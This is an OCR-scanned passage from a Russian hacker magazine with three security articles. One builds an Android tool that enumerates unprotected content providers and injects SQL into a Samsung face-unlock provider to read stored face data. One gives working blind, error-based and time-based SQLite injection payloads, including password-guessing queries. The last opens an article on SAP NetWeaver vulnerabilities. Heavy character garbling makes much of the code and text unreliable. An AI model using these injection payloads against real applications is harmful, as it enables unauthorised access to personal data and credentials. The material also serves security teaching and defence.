о контент-провайдерах разработчики операционной системы по- 
заботились. Они предоставили очень гибкую систему разграниче- 
ния доступа, которая позволяет на многих уровнях тонко отрегули- 
ровать все возможности взаимодействия. 

На самом верхнем уровне можно просто сделать провайдер 
неэкспортируемым и пользоваться им внутри своего приложе- 
ния. Если мы все-таки решили его экспортировать, то можно 
глобально ограничить к нему доступ с помощью параметра 
апбгоіб:регтІ55Іоп в секции <ргоѵібег> манифеста. В качестве 
разрешения можно использовать любое уже определенное в си- 
стеме или задать свое собственное. Это очень удобно, если мы 
хотим разрешить доступ к провайдеру для группы своих прило- 
жений. Мы просто даем всем своим приложениям нестандартное 
разрешение, точно таким же разрешением закрываем доступ 
к провайдеру. После этого все приложения из нашей уютной ин- 
фраструктуры получат доступ к провайдеру на чтение и запись. 

Для более тонкой регулировки можно использовать па- 
раметры апсІгоісіігеасіРегтіззіоп и апбгоіб:ѵѵгіІеРегтІ55Іоп. 

Как ясно из их названий, они позволяют установить отдельно 
ограничение доступа на чтение или запись. Причем эти пара- 
метры имеют больший приоритет, чем более общий параметр 
апбгоісІ:регтІ55Іоп. 



Но есть и еще один, более глубокий уровень регулировки до- 
ступа. Он позволяет разрешить доступ к определенному набору 
информации, который поставляет провайдер. На полную катушку 
в этом случае используется то, что доступ к провайдеру осущест- 
вляется через ІІПІ [ ЬіЦѵ/МЕІ-КСэхІ . 

К сожалению, не все разработчики уделяют внимание вопросам 
безопасности, поэтому многие приложения регистрируют в опе- 
рационной системе контент-провайдеры полностью открытые 
как на чтение, так и на запись. 

ПРОБЛЕМЫ И РЕШЕНИЯ 

Итак, мы уже можем сделать предварительные выводы о том, чем 
нам грозит плохо реализованный контент-провайдер: 

Несанкционированный доступ к персональным данным поль- 
зователя и чувствительной информации. Причиной можетбыть 
открытый контент-провайдер, который установило в систему леги- 
тимное приложениес высокимуровнем привилегий. Предположим, 
мы хотим почитать из своей не совсем легальной программы 5МБ 
пользователя. Если мы запросим напрямую разрешение РЕА0_5М5, 
топривлечем ксебе ненужное внимание. Да ичеловека, который 
установит программу, читающую 5М5, еще нужно поискать. С другой 
стороны, можнопопробоватьнайтиуже зарегистрированный вси- 
стеме контент-провайдер, который установило привилегированное 
стороннее или встроенное приложение. 

Уязвимости типа БОИгцесИоп в провайдерах, работающих 
с базами данных. Ксожалению, фильтрация пользовательского 
ввода полностью отдана на откуп разработчику мобильных при- 
ложений. Болеетого, «корпорация добра»оставила вдокументации 
множество грабель, на которые наступают программисты. Так, в раз- 
делеСопІеп! Ргоѵісіег Вазісз АпсігоісІ ББКесть подраздел Ргоіесііпд 
Адаіпзі Маіісіоиз Іприі, на который многие просто не обращают 
внимания. Разработчики несовсемточно понимают, какработают 
интерфейсы для обращения к БД БСНіІе в АпсігоісІ. Например, многие 
полагают, что повсеместно используемый метод циегу из класса 
апсІгоісі.сІаІаЬазе.здІіІе совершенно безопасен. Но это не соответ- 
ствует действительности, исследователи из МѴѴР І_аЬ5 достаточно 
подробно описали проблему [Ы1.1у /М35]6К ) и даже нашли несколько 
уязвимостей вустройствахБатзипд І ЬіЫѵ/1 1 5Х5М6 ). Онитакже вы- 
пустили удобный фреймворк Мегсигу, который позволяетнаходить 
такие дырки в приложениях. Многие разработчики не используют 
ргерагеб зіаіетепіз, хотя они были в АпсігоісІ с первой версии АРІ 
ІЬІЦѵ/БРЗгКк ). 





я «I ■ 11:49 

СЬоозе сопіепі ргоѵісіег 



соп(ст://сот.ап0гоі(1.*хсііап|е. 

ргоѵісіег 

ЯеаО регті*5ЮПѵсот агкігоіа етаіі 
релпв$юг».АССЕ$$. ИЮѴ10ЕК 
Ѵ/гИе релп«$юпі.<от.ап<ігок1.етаіІ. 
регткііоп >СС Е55 . РЙО ѴІОЕ К 

сопіеп(://сот.апс1гоі(і.(іе$ксІоск 

КеаО регтсиюпі: ■ 

ѴѴгйе регтіиіопѵ • 

соп<еп(://ге((іп|і 
КеаО регтіііют • 

Жгііе регтгеяот апсігоій регтііяоп 
УѴИТЕ.9ГГПЫ65 

соп(епс//сіомтІоа<і* 

КеаО регткаопяапскокі.регтпвяоп. 
АССЕ55.АЦ ООУѴЧІОА05 
ѴѴгііе регтююп&апсігокі.реггпіпіоп 
АССЕК АН ООУУЧЮАОЬ 



Главное окно приложения. Позволяет 
выбрать параметры для вызова 
контент-провайдера 



Список доступных контент- 
провайдеров с указанием выданных 
прав на чтение и запись 



АиЩогііу:сотет://$епіп8$/5есиге 

РгоіесііоптиІІ 

$еІеаіоп:пиІІ 

Беіесгіоп аг§5:пиІІ 

_ісІ:пате:ѵаІие: 

1;ЫиеіооіЬ_оп;0; 

2;баЕа_гоатіп8;0; 
4;Іосаііоп_ргоѵісІег$_аІІоѵѵес1;8р5; 
Б;а55І5іес1_8р$_епаЫе<1; 1 ; 
6;пеіѵѵогк_ргеІегепсе;1 ; 
7;и5Ь_та$5_$іога8е_епаЫе<і;1 ; 
8;\ѵіІі_оп;0; 

9;ѵѵіГі_пеіѵѵогк5_аѵаіІаЫе.поііГіса{іо 

п_оп;1; 

1 0;рге^еггесі_пеіѵѵогк_тосіе;0; 
11;с0та_се11_Ьгоа(ка$1_$т$;1; 

1 2;рге(еггеО_с(іта_5иЬ$сгірііоп;1 ; 

13;тоск_Іосаііоп;1; 

14;Ьаскіір_епаЫе<і;1; 

15;Ьаскир_ггап5рогі;эпсІгоі(1/сот. 

агкІгоісІ.ітегпаІ.Ьаскир. 

І.осаІТгап5роп; 

Шт т ш* — тш 



пятница, 25 января 






Результат запроса к провайдеру 
зеМіпдв 



Биометрическая блокировка экрана 
І5ат$ипдСаІаху5) 
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ПИШЕМ СВОЮ УТИЛИТУ ДЛЯ АНАЛИЗА 
КОНТЕНТ-ПРОВАЙДЕРОВ 

Ранее я уже упомянул Мегсигу от МѴѴР 1_аЬз. Это 
замечательный набор инструментов, и я рекомен- 
дую им пользоваться. К сожалению, лично меня 
повергает в уныние один взгляд на пользова- 
тельское лицензионное соглашение, под которое 
попадает этот продукт. Кроме того, лучше всего 
усвоить материал на практике, тем более когда 
программирование не представляет существен- 
ной сложности. 

Напишем свое приложение под АпсІгоісІ 
для анализа контент-провайдеров. Что мы сде- 
лаем? 

1. Получим информацию обо всех зарегистриро- 
ванных в операционной системе контент-про- 
вайдерах. 

2. Определим, какие из этих провайдеров не за- 
щищены с помощью привилегий. 

3. Немного поэкспериментируем;). 

Как я уже упоминал, провайдеры регистри- 
руются в операционной системе при установке 
приложения. Поэтому самым удобным инстру- 
ментом для извлечения информации будет 
РаскадеМападег. 



..I.. л.. 

.Л 1= 

Л.. Л?ІІІІХІПІ~. ЛІ 
. 7І7ІІІІІІІІІІІІІІІІ. . 

. ЛІІІІІІІІІІІІІІІІІІІІІІ-к 
. . ЛІІІІІІІІІІІІІІІІІІІІІІІІІІ:. 
ЛІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІ. . 

. Л ІІІІІ... , ІІІІІІІІІІІІІ , . . ,111111. 
.7ІХІІХІХ. ЛІІІІІІІІІІІІІІ. ЛІІІІІІІ. 
ЛХИІИХИІИІІХІХІНИХІІІІХНИНІ. 
ЛІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІШІІІ. 

. II ІІІІ ІІІІІІІІІІІІІ II ІІІІІІХІХХІІІІІІ : 
ЛІИІІІИИІИИПХІІІИІІИІИХИІИІ 

ТЬе Неаѵу гаеіаі іНаі ротзопесі іНе сігоігі 

іегсигу» соппесі 127. 0. 0 Л 
'тегсигу> Неір 

;оттапсІБ - іуре Неір <соттапс1> іог тоге іпіо 



асііѵііу ЬгоагісаБі ехіі тосЫез раскадез зегѵісе іооіб 

Ьаск (ІеЬиддаЫе Неір паііѵе ргоѵісіег зЬеІІ 

г-тегсигу> ргоѵісіег 
Гтегсигу#ргоѵіс1ег> Неір 

СіоттапсІБ - іуре Неір <соттапсі> іог тоге іпіо 



Ьаск соіитпз сіеіеіе ехіі ііпсіигі Неір ігѵРо іпзегі диегу геасі ирсіаіе 



Интерфейс командной строки М\МК Мегсигу 



§еіРаска§еМапа§ег() .§еіІп5іа11ес1Раска§е5(Раска§еМапа§ег.«-> 
СЕТ_РКОѴЮЕК5) . 5Іге( ) ; 

■Рог (Раска§еІп-Ро раск: §еіРаска§еМапа§ег() .— 
§еіІП5і:а11есІРаскаее5(Раска§еМапаеег.СЕТ_РК0\/І0ЕК5)) { 
ргоѵісІегБ = раск. ргоѵісІегБ; 
і-р (ргоѵісІегБ != пиіі) { 

■Рог (Ргоѵісіегіп-Ро ргоѵісіег: ргоѵісіегз) { 
і-р ( ргоѵісіег. аиіЬогііу != пиіі) { 

// ргоѵісіег. аиіНогііу 
// ргоѵісіег. геасІРегтіББІоп 
// ргоѵісіег. мгііеРегтізБіоп 

> 

} 

} 



Объект типа РгоѵісІегЫо содержит всю необходимую нам 
информацию. Мы получим соответствующий СопІепіВезоІѵег и об- 
работаем результат и возможные исключения. 



ігу { 

ІІгі игі = ІІгі.раг5е(аиіЬогііу); // Получаем ІШ вида 

// сопіепі: // 

... // Подготавливаем параметры для обращения к контент- 
// провайдеру 

// Запрашиваем данные у контент -провайдера. 

У/ В ответ получим курсор или исключение 
Сигзог с = §еіСопіепіКе5о1ѵег() .циегу(игі, ргд, ^ 
зеіесііоп, зе1_аг§5, пиіі); 

іо* со1_с = с .§еіСо1итпСоипі( ); . . . 

// Проходим курсором по результатам запроса 
і-Р (с.тоѵеТоРігзіО) { 

сіо { 

// Пробежимся по всем колонкам 
■Рог (іпі і = 0; і < со1_с; і++) { 

// Если в колонке, возможно, картинка 



і-р (Со1итпз[і] .іоІомегСазеО .сопіаіпБС'ітаее")) { 
Ьуіе[] ЫоЬ = с.§еіВ1оЬ(і); 

// то показываем в Нех-виде (можно и отобразить 
// на экране устройства) 
б += ЬуіеБТоНех5ігіп§(ЫоЬ); 

} е1$е { 
ігу { 

// Если содержимое колонки не отображается 
// как текст 
б += с.§еі5ігіпб(і); 

} саісН (Ехсерііоп е) { 

// показываем как Нех 
Ьуіе[] ЫоЬ = с .§еіВ1оЬ(і); 

5 += ЬуіеБТоНех5ігіп§(ЫоЬ); 

} 

} 

> 

} ыНіІе (с.тоѵеТо№хі()); 

> 

} саісН (Ехсерііоп е) { 

// Чаще всего исключения возникают из-за недостатка 
// прав или ошибки в запросе, но в любом случае они 
// очень информативны 
5 += е.§еіМе55аее(); 



Остальная часть кода нашего приложения служит для оформле- 
ния пользовательского интерфейса, поэтому я ее опускаю. На вы- 
ходе мы получили небольшую утилиту. 

Раз утилита готова — как я и обещал, немного поэксперименти- 
руем. Я использовал обычный смартфон, старый Батзипд баіаху 5 
с последней официальной прошивкой и некоторым набором самых 
распространенных приложений. 

В списке контент-провайдеров своего телефона ты самостоя- 
тельно можешь найти что-то забавное. Например, мое внимание 
привлек провайдер сот.зес.ргоѵісіег.іасекеу. В асіѵізогу МѴѴР 1_аЬз 
про него ничего не сказано, тем не менее он представляет опреде- 
ленный интерес. Дело в том, что он устанавливается и использует- 
ся системой «биометрической» блокировки экрана по снимку лица. 
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Слабое звено 



Удивительно, что привилегии, запрещающие чтение и запись, 
в данном случае не установлены. Попробуем передать провайдеру 
501 і^есііоп вектор «* (гот здІі1е_тазІег--». 

С интересом узнаем, что мы получили доступ к базе данных 
с табличкой (асе(еа(иге следующего вида: 

СКЕАТЕ ТАВ1.Е ТасеТеаТиге (_і<1 іпі:е§ег ргітагу кеу «-* 
аиіоіпсгетепі, -РасеТіте 1оп§, ТасеТеаіиге ЫоЬ, — 
■Расеіта§е ЫоЬ); 

Данные из этой таблицы легко читаются; кстати, замечу, 
что наша тестовая утилита не запрашивает никаких привилегий. 

Но при этом вполне может считать особенности твоего лица :). 

Немного порывшись в списке, можно считать настройки теле- 
фона из провайдера сот.зеиіпдз (например, соп(еп(://сот.зеиіпдз/ 
зесиге). Это несмотря на то, что разрешения РЕА0_5ЕТТІМЭ5 мы 
не имеем. 

Интересный результат дает обращение к «сопІепІ://согп.доодІе. 
зеиіпдз/5дІі(е_та5(ег— » (что ж, и боодіе промахивается): 

АиТЬогііу : сопТепі : //сот. еоо§1е . 5е1:1:іпе5/5дШ:е_та5Тег- - 

Ргозес*іоп:пи11 

5е1есТіоп:пи11 

Беіесііоп аг§з:пи11 

Туре : пате : ТЫ_пате : гооТра§е : зці : 

ТаЬ1е;апсІгоісІ^е1:асІа1:а;апсІгоі(1_те1:асІаТа; 

3;СКЕАТЕ ТАВІ.Е апс!гоісІ_те1:асІаТа (Іосаіе ТЕХТ); 



ТаЫе ; рагТпег; рагТпег; 

4;СКЕАТЕ ТАВІ.Е рагТпег (_ісІ ІІМТЕСЕР РКІМАКѴ КЕѴ -і 
АІЯОІМСРЕМЕМТ л пате ТЕХТ ІШСЭІІЕ ОМ СОЛИСТ КЕРІ_АСЕ,-і 
ѵаіие ТЕХТ); 

іпсіех ; 5ЦІіТе_аиТоіпсІех_рагТ:пег_1 ; рагТпег; 

5;пи11; 

ТаЫе; 5д1іТе_зедиепсе; 5д1іТе_зециепсе; 

6;СКЕАТЕ ТАВІ.Е зд1іТе_5едиепсе(пате, зец); 
іпсіех; рагіпегіпсіехі; рагТпег; 

7;СКЕАТЕ ІШЕХ рагТпегІпсІехІ ОМ рагТпег (пате); 

Дальнейшие эксперименты я оставляю читателю. Все исходные 
тексты утилиты доступны на СііНиЬ І ЬіІ.Іѵ/Ѵ802ЬО ). 

МЕМБЫТО МОРІ 

Итак, мы рассмотрели одно из слабых мест в АпсІгоісІ- 
приложениях. Я постарался показать, насколько важно исполь- 
зовать по максимуму возможности по разграничению доступа, 
которые предлагает операционная система. 

Разработчикам мобильных приложений хочется напомнить, 
что, написав контент-провайдер, вы принимаете решение по- 
делиться информацией, поэтому стоит подумать, кто и в каком 
объеме сможет получить к ней доступ. Также многие забывают, 
что уязвимостям типа 5СІІ_ іпіесііоп подвержены не только веб- 
приложения. Поэтому санитизацию пользовательского ввода 
и использование ргерагеб зіаіетепіз никто не отменял, даже 
под Апсігоісі. з: 



КАК ЗАДАЮТСЯ СВОЙСТВА 
КОНТЕНТ-ПРОВАЙДЕРА 

Если обратиться к АпсігоісІ 5йК (где весь процесс расписан 
очень подробно и по шагам), то видно, что для того, чтобы 
зарегистрировать свой контент-провайдер, тебе придется добавить 
описание провайдера в файл АпсІгоісіМапКезІ.хтІ в секцию <ар- 
рІісаІіоп>. Параметров при этом можно указать множество ( 

), но мы рассмотрим лишь важные для нас: 

<ргоѵіс!ег 

апсігоісі : аиТЬогіТіез="сот. Тез* . ргоѵігіег" 
апсігоісі : пате= н . ргоѵісіег .МуСопТепТРгоу^ег" 
апсігоісі : ехрогТес^Чгие | •Раізе” > 

</ргоѵіс!ег> 

Важная особенность — доступ к данным будет осуществляться 
при помощи специального ІІКІ со схемой «сопіепі». Параметр 
апсІгоісІ.аиІЬогіІіез является уникальным идентификатором 
провайдера и представляет собой первую часть ІІВІ, вторая часть 
будет указывать на то, какие именно данные мы хотим получить. 
Параметр апс!гоісі:ехрогІес1 показывает, доступен ли провайдер для 
других приложений. Уже тут есть маленькая особенность, которая 
может испортить жизнь разработчику. Этот параметр в версиях Ап- 
Сігоісі до 16-й включительно (Апсігоісі 4.1 ЭЕІ_1_Ѵ_ВЕАМ) по умолчанию 
установлен в «Ігие», и все контент-провайдеры экспортируются, 
естественно, такая ситуация не безопасна. Но только с версии 17 
(Апсігоісі 4.2 ЭЕЦ_У_ВЕАМ_МВ1) в ОС было внесено исправление, 
и теперь, чтобы экспортировать провайдер, необходимо 
самостоятельно изменить используемый по умолчанию «Іаізе». 

Итак, в нашем случае для доступа к контент-провайдеру можно 
будет использовать ІІКІ вида: 




сопТепТ : //сот . Тез* . ргоѵіЬег/§іѵе ^пе_0аТа_міТІі_ісІ/123 

Фантазия разработчика при написании провайдера мало чем 
ограничена, дело в том, что обязательно нужно переопределить 
всего лишь шесть абстрактных методов (яиегуП, іпзегіІ), ирсІаІеП, 
сіеіеіеі), деПуреО, опСгеа(еП). При этом никто не запрещает сделать 
эти методы пустыми, возвращать на любой запрос константу, 
результат чтения файла или обращения к сети. Тем более если 
твой провайдер предоставляет доступ к данным только на чтение, 
то методы іпзегіО, ирсіаіеО и так далее ему совсем не нужны. 

И хотя никто не принуждает программиста прятать «под 
капотом» своего контент-провайдера базу данных, но очень часто 
тут встречается хорошо знакомая всем разработчикам мобильных 
приложений для Апсігоісі 501Ле. Тем более что используемый для 
получения данных СопІепіВезоІѵег всегда возвращает объект типа 
Сигзог, что тонко намекает... 
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Алексей Синцов (сіеісопгиззіайдтаіі.сот) 




Мир БСИ-инъекций огромен. В реальной работе сам факт наличия уязвимости — 
это недостаточное условие для радости, ведь надо еще суметь ей воспользовать- 
ся. Инъекции бывают разными, но самые неприятные — это те, которые не возвра- 
щают логического результата. Слепые инъекции, особенно в БОІЛе, — печальная 
штука. Сегодня я расскажу о техниках эксплуатации БОН в этой базе данных... 



идя 

Вся информация предоставле- 
на исключительно в ознакоми- 
тельных целях. 

Ни редакция, ни автор не несут 
ответственности за любой воз- 
можный вред, причиненный 
материалами данной статьи. 



то же, для тех, кто хочет освежить 
терминологическую базу по 501_і, 
напомню основные классы ситуа- 
ций. В общем, это применимо ко всем 501- 
образным СУБД. 

ПРОСТАЯ 50Ц 

Банальная 50І_-инъекция без ухищрений — ка- 
кой запрос приходит в БД, такой ответ мы и по- 
лучаем прямым выводом (например, в ответ 
веб-сервера). Такой тип эксплуатируется легче 
всего, не нужно ничего придумывать. Пример: 

пем5.рЬр?ісІ=1 

выводит текст из СУБД, допустим с какой-то 
новостью. Если выбрать несуществующую 
новость, то вернет N111.1: 

пем$.рЬр?ісІ=-1 

Соответственно, чтобы выбрать что-либо 
«секретное» из БД, достаточно применить 
операцию ІІМІСЖ 5Е1.ЕСТ — МШ_І_ объединится 
с новой выборкой, в результате чего именно 
результат второго селекта и будет возвращен: 

пеѵУ5.рНр?ісІ=-1 ипіоп 5е1есТ ЧехТ' 



Соответственно, на экран будет выведена 
строка «Іехі». 

Обнаруживать такие уязвимости так же 
просто: 

пеѵУ5.рНр?ісІ=1 апР 1=1 
пе\л/5.рМр?ісІ=1 апсі 1=0 

В общем, с этим делом все ясно. 

СЛЕПАЯ 5СІЫ 

Бывают другие ситуации, когда вывод строго 
ограничен. Такие инъекции по обнаружению 
ничем не отличаются от простых, зато по выво- 
ду данных отличаются. Дело вот в чем: резуль- 
тат того, что скрипт возвращает, не содержит 
вывода из СУБД (точнее, из того запроса, 
на который мы воздействуем). Тогда ІІМІОМ 
5Е1.ЕСТ нам не поможет. Но и методы борьбы 
с такими вещами тоже известны — изменение 
логики (истинности или ложности запроса) 
влияет на контент. Например, такой запрос 
возвращает текст новости: 

пеѵу/$.рЬр?ісІ=1 

Очевидно, что и такой запрос вернет 
новость: 



пемз.рЬр?ісІ=1 апсі 1=1 

Тогда как такой запрос вернет ошибку или 
еще что: 

пем5.рЬр?ігі=1 апсі 1=0 

Ну и для выдергивания данных можно дей- 
ствовать по аналогии, не буду тратить время, 
все это уже и так знают: 

пем5.рЬр?ісІ=1 апсі (зеІесТ раззиогсі — 
•Ргот и5ег5)1іке'ра55%' 

Если пароль действительно начинается 
с «раз5», то вернется оригинальный текст 
новости, в противном случае — ошибка. 

Второй вариант эксплуатации — если есть 
вывод об ошибке, в случае неправильного 
5СІІ_-запроса. Тогда вывод мы будем оцени- 
вать не по истинности или ложности запроса, 
а по правильности. Кроме того, стоит отметить, 
что иногда в текст ошибки можно встраивать 
данные из СУБД, тем самым делая ее «не 
слепой» (это если подфартит и вывод ошибок 
не отключен). Ну и конечно, есть еще вариант 
с временными задержками при обработке 501- 
запроса... Более подробно обо всем этом уже 



088 



ХАКЕР 03/170/2013 





Легкий ВІіпсі! 




Еггог-Ьа$е(І метод 

писал Дима Евтеев в далеком 2009-м: «Хакер» 
№ 12 (132). Так что бросим затянувшееся введе- 
ние и перейдем к делу... 

АБСОЛЮТНАЯ СЛЕПОТА В 50ЫТЕ 

Так случилось, что столкнулись мы с очень 
слепой инъекцией в БОЫіе. Слепота заключа- 
лась в том, что логика запроса никак не вли- 
яла на вывод. Так что, понятно, объединение 
запросов не помогало, игра с логикой запроса 
тоже. Все, что мы знали, — что инъекция есть: 

5сгірТ.рЬр?ісІ=і 
Результат: страница 



Бсгірі. рНр?ісІ=11212 
Результат: страница 



$сгірТ . рЬр ? ісІ= - 99 
Результат: страница 



зсгір-^ . рИр ?ісІ=-99-’ 

Результат: ошибка без деталей 
Вывод: возможно, инъекция 



5сгірі.рНр?ісІ=1 апсі 1=1 
Результат: страница 



5сгірі.рНр?ісі=1 апсі 1=0 
Результат: страница 



5Сгірі.рНр?ісі=1 апсІХХХ 1=0 
Результат: ошибка без деталей 
Вывод: точно инъекция 

Перебирая все варианты функций, поняли, 
что зІеерП, беІауП, 0(Эѵег5Іоп, ѵегзіопП система 
не поддерживает (то есть запросы с этими 
вызовами возвращают все ту же ошибку), но, 
когда попробовали 5ЦІі1е_ѵег5Іоп(), ошибки 
не было! Но вот незадача — как получить что- 
то из БД? Ну например, тот же номер версии... 
вот тут-то и зарылась собака. Как уже было 
сказано, временных задержек в БСІІЛе нету, 
так что Ііте-Ьазеб нам не светит. Пытаясь по- 
нять, что можно сделать, я вспомнил про воз- 
можность загрузки библиотеки через функцию 
Іоаб_ех1еп5Іоп(), но, к сожалению, исполь- 
зование БТАТЕРШ-фильтрации срезало все 
исходящие соединения, и потому протроянить 
цель было невозможно. АТТАСН БАТАВАБЕ 



для заливки РНР отказался работать (ни пере- 
вод строк, ни символ «;» не проходили в запро- 
се). Казалось бы, все. Печаль. Провал. Но мой 
коллега не захотел сдаваться и продолжил 
играться с функцией Іоагі_ехІеп5Іоп() — и по- 
нял, как можно ее использовать для органи- 
зации еггог-Ьазесі эксплуатации. Так что мы 
выкрутились так: 

пемз.рНр?ісІ=1 ипіоп зеіесі: (САБЕ МНЕМ — 
5ЦІі1:е_ѵег5іоп() Пке '3.%' ТНЕМ 'Неге' «-* 
ЕІ.5Е 1оасІ_ех1:еп5іоп( ’ЫаН' ) ЕМО) -- 

Результат: Если это третья версия БСН-іІе, 
то возвращается оригинальная страница, если 
нет, то ошибка. 

Как видите, идея проста и основана 
на том, что если срабатывает ІоасІ_ехІеп5іоп(), 
пытаясь открыть несуществующий файл, 
то получается ошибка. Таким образом, уже 
используя логику и влияя на ошибку, можно 
получать результаты. Соответственно, упро- 
стив идею, можно вообще обойтись без функ- 
ции Сережи: 

пеѵу/5.рИр?ісІ=1 ипіоп зеіесі 
(САБЕ МНЕМ зцІііе^егзіопО-' 

Ике '3.%' ТНЕМ 'Неге' - 
Е1.5Е (зеіесі 'ааа' 

-Ргот поі_а_1:аЫе) ЕМО) -- 

Результат: Если это третья версия БСНЛе, 
то возвращается оригинальная страница, 
если нет, то ошибка, так как нет такой табли- 
цы — по1_а_1аЫе. 

Уже потом гаВІаскРап поделился своими 
векторами работы с БСНіІе. Идея та же, только 
еще и вывод в текст ошибки помогает встра- 
ивать, и если будет вывод ошибки в браузер, 
то всё это станет намного полезнее и эффек- 
тивнее: 

СКЕАТЕ ѴІКТІІАІ. ТАВ1.Е П ІШМС Ті53(х); 
5ЕІ.ЕСТ * РВОМ ИІ МНЕВЕ іі МАТСН - 

' | |5ЦІііе_ѵег5іоп() ; 




Тіте-Ьазеіі метод — тормоз-запрос (неверный). 
Для брутфорса лучше наоборот :) 



таІ-РогтесІ МАТСН ехргеББІоп: [”3.6.23.1] 
Примечание: Только для таблиц -РІІ53/-РТ54 



зеіесі сазе іл/Иеп 1=2 іНеп 1 еізе 1 -< 
Ііке 1 езсаре 11 епсі; 

Еггог: Е5САРЕ ехргеззіоп гтш$1: Ье «-• 
а зіп§1е сНагасіег 

Естественно, бывают еще случаи с су- 
пер-пупер-двойны ми-слепыми инъекциями. 
Это тогда, когда даже в случае ошибочного 
запроса вывод тот же. Владимир Воронцов 
рекомендует использовать аналогичную 
схему, только вместо генерации ошибочного 
запроса (который тут окажется бесполезен) 
предлагает использовать любую операцию, 
которая повлияет на время отклика. Ребята 
из ВБоІ (ага, тот же (ЭВІаскРап) уже пытали эту 
технику и достигли успеха. Так, наши друзья 
советуют использовать функцию гапботЫоЫ). 
Ну и для полноты картины смотри пример 
с временной задержкой: 

пемз.рНр?ісІ=1 ипіоп зеіесі 
(САБЕ МНЕИ 5ЦІі1:е_ѵег5іоп()^ 

Ііке '3.%' ТНЕМ 'Неге' ^ 

ЕІ.БЕ гапсІотЫоЬ( 50000000) ЕМй)-- 

Результат: Если это третья версия БОІЛе, 
то возвращается оригинальная страница 
и быстро, если нет, то возвращаться будет 
долго. Играя с параметром функции, можно 
установить приемлемое для брутфорса время. 
(Только имейте в виду, что для эффективной 
работы ложные ответы должны быть быстры- 
ми, а правильные — тормозить, так как брут- 
форс — это все-таки большее количество 
неверных запросов...) 

Как видите, логика эксплуатации еггог- 
Ьазеб и Іілпе-Ьазесі инъекций одинакова 
для всех 5СН_-образных СУБД. Даже для такой 
полуобрезанной и маленькой, как БСНЛе. 

Не сдавайтесь и верьте в себя! □□ 




Тіте-Ьавесі метод — быстрый запрос (верный) 
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БАР: под шквалом 

дм 

Вся информация 
предоставлена исклю- 

РАЗБИРАЕМ МНОЖЕСТВЕННЫЕ УЯЗВИ- 
МОСТИ В ДВИЖКЕ 5АР ЫЕТѴѴЕАѴЕВ Э2ЕЕ 




Интерес мирового бизнеса к системам 
планирования и управления ресурсами 
предприятия неуклонно растет. Сегодня более 
120 000 компаний, включая такие гиганты, 
как ІВМ, АТ&Т, Арріе, Соса-Соіа и ВМѴѴ, 
используют программные продукты компании 
БАР. Проведенные нами исследования 
позволили обнаружить множество уязвимостей, 
с помощью которых удаленный пользователь 
может обойти механизм аутентификации 
и выполнить любое действие в БАР-системе, 
не используя никаких клиентских данных. 



ВВЕДЕНИЕ 

5АР — это разработчик программного обеспечения для автома- 
тизации бизнес-процессов, выпускающий огромное множество 
одноименных продуктов. Наиболее популярна из них БАР ЕВР 
(Епіегргізе Везоигсе РІаппіпд) — система управления ресурсами 
предприятия, которая хранит и обрабатывает все критически 
важные данные о компании, например информацию о поставщиках, 
зарплатные данные, финансовую отчетность и прочее. Такая авто- 
матизированная система позволяет эффективно решать комплекс- 
ные задачи, включая оптимальное распределение бизнес-ресур- 
сов, обеспечение быстрой и эффективной доставки товаров и услуг 
потребителю. В отличие от, например, бухгалтерских программ, 
которые позволяют только вести бизнес-учет, ЕВР обеспечивает 
информационную поддержку принятия управленческих решений. 
Стоит отметить, что ЕРР позволяет оптимизировать не только 
внутренние процессы предприятия, но и бизнес-процессы деловых 
партнеров и клиентов. 
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БАР: под шквалом разящих стрел 



Существует миф о том, что БАР ЕРР — это безопасная система 
и единственная проблема безопасности в этой системе — матри- 
ца 5(Ю (матрица разграничения полномочий), то есть матрица, 
где описывается, какие наборы привилегий в системе не стоит 
давать одному пользователю. К примеру, если пользователь может 
создать платежное поручение на какую-нибудь фирму, а также 
проапрувить это поручение, то он может совершать различные 
мошеннические операции. Таких пересечений существует больше 
двухсот, в зависимости от области бизнеса. Естественно, данная 
матрица очень важна, и ее создание и соблюдение крайне сложная 
задача, но еще более важно, чтобы лица, которые вообще не имеют 
никакого доступа в БАР, не смогли стать там администраторами. 

За последние пять лет появилось много исследований в обла- 
сти безопасности БАР (по недавним подсчетам, около ста уникаль- 
ных работ), начиная от атак на БАР 6111 и БАР Роиіег и заканчивая 
архитектурными уязвимостями в протоколе РРС и уязвимостями 
программ, написанных на АВАР. БАР, в свою очередь, тоже не дрем- 
лет и расширяет отдел БесипЧу РеБропзе Теат, который отвечает 
за контакты с внешними исследователями. С ними мы постоянно 
сотрудничаем, консультируя о новых способах взлома и возможных 
вариантах защиты. Кроме того, компания БАР выпускает стан- 
дарты по техническим вопросам безопасности БАР, подтверждая 
существование проблемы, связанной с отсутствием единой базы 
требований к безопасности, а также покупает компании разработ- 
чиков систем безопасности, таких как, например, поставщик реше- 
ний по шифрованию трафика Бесибе. 

НАЧНЕМ, ПОЖАЛУЙ 

Все основные продукты БАР используют одну из трех платформ: 
ЫеіѴѴеаѵег АВАР, ІЧеіѴѴеаѵег ^ѵа и ВизіпеБЗ ОЬіесІз. Платформа 
ЫеіѴѴеаѵег Эаѵа используется во множестве продуктов БАР, обе- 
спечивающих интеграцию и контроль над бизнес-приложениями. 
Это такие продукты, как БАР Рогіаі, БАР МоЬіІе Іп(га5ІгисІиге, БАР 
XI и Боіиііоп Мападег, а также ряд менее популярных решений. 
Критичность данных систем нельзя недооценить, так как они обе- 
спечивают интеграцию с другими системами и, например, взломав 
БАР Рогіаі предприятия через интернет, можно получить доступ 
к другим ресурсам компании через Біпдіе 5ідп-0п или, например, 
через уязвимый БАР Боіиііоп Мападег (аналог контроллера домена 
и сервера обновлений в ѴѴіпсіоѵѵз-среде) можно внедрить злонаме- 
ренный код во все подключенные к нему БАР-системы. 

Наши исследования безопасности Эаѵа движка БАР, начатые 
более трех лет назад, привели к тому, что было обнаружено около 
двухсот уязвимостей, большая часть которых на данный момент 
закрывается производителем, и осталось еще много неизученных 
областей, над которыми ведется работа. Практически все уязвимо- 
сти не являются единичными, а представляют собой целый класс 
проблем, примеры которого постоянно обнаруживаются. Наибо- 
лее критичные из обнаруженных уязвимостей позволяют обойти 




боодіе — незаменимый помощник. Запрос показывает 5АР-сервера компаний 

механизм аутентификации и выполнить любое действие в системе 
удаленно, не используя никаких пользовательских данных. В слу- 
чае если система имеет доступ в интернет, то даже двухфакторная 
аутентификация не спасет от данной атаки и злоумышленник смо- 
жет элементарно получить доступ к сердцу компании удаленно. 

5АР В ИНТЕРНЕТЕ 

Сейчас нет ни одной статьи про какую-нибудь систему, где бы 
